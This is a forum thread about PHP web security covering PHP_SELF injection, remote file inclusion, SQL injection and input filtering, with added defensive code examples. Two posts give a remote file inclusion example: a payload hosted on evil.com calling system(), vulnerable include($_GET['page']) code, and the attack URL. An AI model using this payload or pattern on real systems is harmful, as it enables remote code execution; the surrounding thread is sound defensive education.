1. Banned (not really)
    Devshed Supreme Being (6500+ posts)

    Simon brought up this article on how $PHP_SELF and $_SERVER['PHP_SELF'] are taken directly from user input and can be manipulated to contain malicious content.

    I never thought of them as user input, so this was interesting to me.

    ---John Holmes...

    Comments on this post

    • codergeek42 agrees : Nice read. Thanks, Sep. :)
    -- Cigars, whiskey and wild, wild women. --
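The PHP_SELF issue from the article above, as an added example that is not part of the original post: the same form-action output once raw and once escaped for an HTML attribute, using a constructed PHP_SELF value with attacker-supplied extra path info.

```php
<?php
// Added example (not from the thread). $php_self stands in for
// $_SERVER['PHP_SELF']; the value below is constructed to show how extra
// path info appended to the script URL ends up inside the attribute.

// Unsafe: PHP_SELF is echoed straight into the action attribute.
function form_action_unsafe(string $php_self): string
{
    return '<form action="' . $php_self . '" method="post">';
}

// Safe: escape for an HTML attribute context before output. ENT_QUOTES
// covers both quote styles, so the value cannot close the attribute.
function form_action_safe(string $php_self): string
{
    $escaped = htmlspecialchars($php_self, ENT_QUOTES, 'UTF-8');
    return '<form action="' . $escaped . '" method="post">';
}

// Constructed PHP_SELF: the real script path followed by path info that a
// request such as /index.php/"><b>injected</b><a href=" would produce.
$crafted = '/index.php/"><b>injected</b><a href="';

echo form_action_unsafe($crafted), "\n"; // attribute is closed early, markup injected
echo form_action_safe($crafted), "\n";   // quotes and brackets are entity-encoded
```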
  2. His name is Robert Paulson!
    Devshed Frequenter (2500 - 2999 posts)

    Originally Posted by Sepodati
    Simon brought up this article on how $PHP_SELF and $_SERVER['PHP_SELF'] are taken directly from user input and can be manipulated to contain malicious content.

    I never thought of them as user input, so this was interesting to me.

    ---John Holmes...
    Obviously building portable code, this can be an issue, but I tried the mentioned tests on my server (IIS), and it errors out, never processing the code. I guess it's really no big deal to CYA and use htmlentities or specialchars on the PHP_SELF output... is that the consensus... there seems to be quite a bit of confusion with the user response at the bottom...
    Environmental LIMS
    What the hell is all this LIMS st*ff about?
    ---------------------------------------
    PHP Pagination Function
    PHP Drop Down Menus
  3. Registered User
    Devshed Newbie (0 - 499 posts)

    Originally Posted by Sepodati
    Simon brought up this article on how $PHP_SELF and $_SERVER['PHP_SELF'] are taken directly from user input and can be manipulated to contain malicious content.

    I never thought of them as user input, so this was interesting to me.

    ---John Holmes...
    Thanks, seems like I will have to do a little fixing I guess.
  4. Moderator Emeritus
    Devshed Supreme Being (6500+ posts)


    SANS Top 20 Vulnerabilities - PHP is # 3


    If you're a PHP developer or an admin of a server actively running PHP, you should read this article:

    http://www.sans.org/top20/#c3

    SANS has identified several PHP-related threats as being #3 on their list of Top 10 cross-platform vulnerabilities, right after backup and anti-virus software (Microsoft has their own category).

    Beyond what you as a developer and/or admin can do to mitigate these risks (like using the Hardened PHP distro), we as PHP developers/admins should be asking Zend what they're actively doing to reduce these risks.
    DrGroove, Devshed Moderator | New to Devshed? Read the User Guide | Connect with me on LinkedIn
  5. Contributing User
    Devshed Beginner (1000 - 1499 posts)

    Originally Posted by drgroove
    If you're a PHP developer or an admin of a server actively running PHP, you should read this article:

    http://www.sans.org/top20/#c3

    SANS has identified several PHP-related threats as being #3 on their list of Top 10 cross-platform vulnerabilities, right after backup and anti-virus software (Microsoft has their own category).

    Beyond what you as a developer and/or admin can do to mitigate these risks (like using the Hardened PHP distro), we as PHP developers/admins should be asking Zend what they're actively doing to reduce these risks.
    My biggest issue with articles like this is that there are no examples to test the issues with my own scripts. E.g. I have, in the past, tried to do the remote file include, I think by building a page that had an include($_GET['file']) kind of thing. I never could get it to work. Does that mean my server (which was a shared hosting service) is set up correctly against that kind of thing, or was I not attacking properly?

    I have also tried to do MySQL attacks (like adding a ; and then a drop database kind of thing) in an unvalidated input field, again with no effect.

    Does anyone have a toolkit with examples to attempt exploits?

    Obviously a hacker could use this, but I gotta think they already do.
    Suddenly nothing happened.
  6. Wiser? Not exactly.
    Devshed God 1st Plane (5500 - 5999 posts)

    Originally Posted by TuxLives
    Does that mean my server (which was a shared hosting service) is setup correctly against that kind of thing, or was I not attacking properly.
    Probably the latter. For instance, the include() attack is a pretty easy one to pull off. One limiting factor for a while (but not anymore) was that the Windows version of PHP didn't support include()ing URLs. You could still include other files on the computer though.

    The include attack has quite a few examples out there (I've written some of em) but as a repeat it's a little something like this:

    [code=http://www.evil.com/script.txt]
    <?php
    system('ls -l'); //Or whatever bad code they wanted to write.
    ?>
    [/code]

    [code=http://www.vulnerable.com/index.php]
    <?php
    if ($_GET['page']) {
    include($_GET['page']);
    }
    else {
    include('main.php');
    }
    ?>
    [/code]

    attack with: http://www.vulnerable.com/index.php?page=http://www.evil.com/script.txt



    SQL Injection using mysql is another one that is a little bit harder to do as well. Main reason being that in PHP, you can't send multiple queries to mysql in one call to mysql_query. That restriction may eventually be lifted though, I couldn't tell you.

    However, if say you were using a db wrapper, and then your script got moved to another database system such as MS-SQL where multiple queries at once was a valid thing, then a person could exploit unescaped input to add a drop query to the end of your query, or some other equally bad statement.
    Recycle your old CD's, don't just trash them



    If I helped you out, show some love with some reputation, or tip with Bitcoins to 1N645HfYf63UbcvxajLKiSKpYHAq2Zxud
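The fix for the include($_GET['page']) pattern above, as an added example that is not kicken's code: the request value is only ever used as a key into a fixed whitelist, so neither the evil.com URL nor any other file name the request supplies reaches include(). PAGE_DIR, $pages and resolve_page() are names chosen for this example.

```php
<?php
// Added example (not from the thread): whitelist dispatcher replacing
// include($_GET['page']). The request value selects an entry in $pages;
// anything not in the map falls back to the default, exactly as the
// original else-branch did with main.php.

const PAGE_DIR = __DIR__ . '/pages';   // assumed location of the page files

// The only request values that are ever turned into a file name.
$pages = [
    'main'    => 'main.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(?string $requested, array $pages, string $default = 'main'): string
{
    // Exact key lookup: no type juggling, no path components, no URLs.
    $key = ($requested !== null && array_key_exists($requested, $pages))
        ? $requested
        : $default;
    return PAGE_DIR . '/' . $pages[$key];
}

// Constructed requests: the second is the attack URL from the post above and
// the third a local file outside the whitelist; both resolve to the default.
$requests = ['about', 'http://www.evil.com/script.txt', 'admin.php', null];
foreach ($requests as $req) {
    printf("%-40s -> %s\n", var_export($req, true), resolve_page($req, $pages));
}
// In a real script: include resolve_page($_GET['page'] ?? null, $pages);

// Defence in depth, independent of the whitelist (php.ini):
//   allow_url_include = Off
//   allow_url_fopen   = Off   (if nothing on the server needs remote fopen)
```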
  7. Contributing User
    Devshed Beginner (1000 - 1499 posts)

    Originally Posted by kicken
    Probably the latter. For instance, the include() attack is a pretty easy one to pull off. One limiting factor for a while (but not anymore) was that the Windows version of PHP didn't support include()ing URLs. You could still include other files on the computer though.

    The include attack has quite a few examples out there (I've written some of em) but as a repeat it's a little something like this:

    [code=http://www.evil.com/script.txt]
    <?php
    system('ls -l'); //Or whatever bad code they wanted to write.
    ?>
    [/code]

    [code=http://www.vulnerable.com/index.php]
    <?php
    if ($_GET['page']) {
    include($_GET['page']);
    }
    else {
    include('main.php');
    }
    ?>
    [/code]

    attack with: http://www.vulnerable.com/index.php?page=http://www.evil.com/script.txt



    SQL Injection using mysql is another one that is a little bit harder to do as well. Main reason being that in PHP, you can't send multiple queries to mysql in one call to mysql_query. That restriction may eventually be lifted though, I couldn't tell you.

    However, if say you were using a db wrapper, and then your script got moved to another database system such as MS-SQL where multiple queries at once was a valid thing, then a person could exploit unescaped input to add a drop query to the end of your query, or some other equally bad statement.
    Great, thanks. I think that the community really needs solid examples that we can say "this will test for this", that way if I try it and it does not work I can check something off my list (like my validation is working or globals are off or whatever).
    Suddenly nothing happened.
  8. Contributing User
    Devshed Novice (500 - 999 posts)

    Put a file named index.php in every directory of your project, so that if someone tries a URL like http://www.somename.com/images/ to see the list of images, he will be unable to do so.

    You can also do the same thing in the server settings or through an .htaccess file if you don't want to put index.php in all the directories.
  9. Redpill
    Devshed Intermediate (1500 - 1999 posts)

    You could just mark all the folders "403 Forbidden" and set up 403 to redirect somewhere.
  10. Registered User
    Devshed Newbie (0 - 499 posts)

    This thread took me a while to read. I still have yet to figure out why so many people were fighting over the .inc files. It's just an extension. .inc.php works just as well, no .htaccess would be needed. It shows that it is an include file WITH PHP contents. Also, like someone said above, you can always just add:

    mainfile.php
    Code:
    <?php
    
    define("IN_SCRIPT", true);
    
    ?>
    include.inc.php
    Code:
    <?php
    
    if(!defined("IN_SCRIPT")) {
          die("Hacker attempt!");
    }
    
    ?>
    The above example is based off of PHPBB.
  11. The Scott Spirit
    Devshed Novice (500 - 999 posts)

    To make sure a file is included and not being executed directly I use this line of code:
    php Code:
    //do not run if not included.
    if (realpath(__FILE__) == realpath($_SERVER['SCRIPT_FILENAME'])) {
      exit;
    }


    works like a charm!

    Comments on this post

    • Thr3ddy agrees
  12. Web Developer/Musician
    Devshed Regular (2000 - 2499 posts)

    Remember user input doesn't just mean normal GET and POST variables. One XMLRPC exploit I saw (PHPAds), exploited the use of eval while sorting through data from XML. With web services being so popular, be aware of this.
  13. fork while true;
    Devshed God 1st Plane (5500 - 5999 posts)

    Originally Posted by Hammer65
    Remember user input doesn't just mean normal GET and POST variables. One XMLRPC exploit I saw (PHPAds), exploited the use of eval while sorting through data from XML. With web services being so popular, be aware of this.
    Eval is a major major hole. PHP is one of those languages where there is a function for everything if you look hard enough; you should NEVER need to use eval. There was a big hole in PHP's xml parsing itself a while back because the author used eval.
  14. Contributing User
    Devshed Newbie (0 - 499 posts)

    Thanks for the great information
    Thanks,
    Wiz
  15. Banned (not really)
    Devshed Supreme Being (6500+ posts)

    If you're using PHP 5.2 or later, use the built-in Filter Functions to sanitize and validate user input. If you're stuck on an earlier version, try to include the extension through PECL.

    Also note that the filter.default and filter.default_flags can be set in php.ini, .htaccess or within your script with ini_set().

    ---John Holmes...
    -- Cigars, whiskey and wild, wild women. --
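The filter functions from the post above in use, as an added example that is not Sepodati's code: a field definition applied to a request array with filter_var_array(). $request is a constructed array standing in for $_GET so the script runs offline; with a live request the same $definition goes to filter_input_array(INPUT_GET, $definition).

```php
<?php
// Added example (not from the thread): validating request fields with the
// filter extension (PHP 5.2+, or PECL filter on older versions).

$definition = [
    // Integer and at least 1: "0", "-5" and "12abc" all come back as false.
    'id'    => ['filter'  => FILTER_VALIDATE_INT,
                'options' => ['min_range' => 1]],
    // Syntactically valid e-mail address, or false.
    'email' => FILTER_VALIDATE_EMAIL,
    // A page name destined for include(): lowercase letters only, so a URL
    // or a path never passes.
    'page'  => ['filter'  => FILTER_VALIDATE_REGEXP,
                'options' => ['regexp' => '/^[a-z]{1,20}$/']],
];

// Returns one entry per defined field: the validated value, false when the
// input failed its filter, or null when the field was absent from the request.
function validate_request(array $request, array $definition): array
{
    return filter_var_array($request, $definition);
}

// Constructed input: one good field, one out-of-range number, and the
// remote-include URL from earlier in the thread as the page name.
$request = [
    'id'    => '0',
    'email' => 'user@example.com',
    'page'  => 'http://www.evil.com/script.txt',
];

foreach (validate_request($request, $definition) as $field => $value) {
    printf("%-5s => %s\n", $field, var_export($value, true));
}
// Treat any false/null entry as a rejected request; never fall back to the raw value.
```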
